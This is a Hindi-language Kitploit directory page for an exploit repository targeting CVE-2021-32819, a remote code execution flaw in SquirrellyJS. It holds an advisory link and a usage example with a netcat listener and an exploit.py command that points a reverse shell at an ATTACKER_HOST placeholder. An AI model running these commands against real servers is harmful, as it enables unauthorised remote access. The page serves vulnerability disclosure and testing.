Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-32819 — SquirrellyJS एक्सप्रेस रेंडर API के माध्यम से शुद्ध टेम्पलेट डेटा को इंजन कॉन्फ़िगरेशन विकल्पों के साथ मिश्रित करता है। आंतरिक कॉन्फ़िगरेशन विकल्पों को अधिलेखित करके, डाउनस्ट्रीम अनुप्रयोगों में दूरस्थ कोड निष्पादन को ट्रिगर किया जा सकता है। | Kitploit
उपकरण/GitHubGitHub/abady0x1/cve-2021-32819
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणरिमोट एक्सेस टूल
GitHubabady0x1/cve-2021-32819

CVE-2021-32819

SquirrellyJS एक्सप्रेस रेंडर API के माध्यम से शुद्ध टेम्पलेट डेटा को इंजन कॉन्फ़िगरेशन विकल्पों के साथ मिश्रित करता है। आंतरिक कॉन्फ़िगरेशन विकल्पों को अधिलेखित करके, डाउनस्ट्रीम अनुप्रयोगों में दूरस्थ कोड निष्पादन को ट्रिगर किया जा सकता है।

रिपॉजिटरी देखें
10125 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-32819

CVE-2021-32819 : SquirrellyJS शुद्ध टेम्पलेट डेटा को Express रेंडर API के माध्यम से इंजन कॉन्फ़िगरेशन विकल्पों के साथ मिलाता है। आंतरिक कॉन्फ़िगरेशन विकल्पों को ओवरराइट करके, डाउनस्ट्रीम अनुप्रयोगों में रिमोट कोड निष्पादन ट्रिगर किया जा सकता है।

स्रोत

https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/

विश्लेषण

https://blog.diefunction.io/vulnerabilities/ghsl-2021-023

squirrelly

v8.0.0 >= v8.0.8 रिमोट कोड निष्पादन

पर्यावरण

Ubuntu 20.04.1

उदाहरण

root@kitploit:~
nc -lvp 443

python3 exploit.py http://example.com/  ATTACKER_HOST 443

प्रमाण की अवधारणा

टूल डाउनलोड करें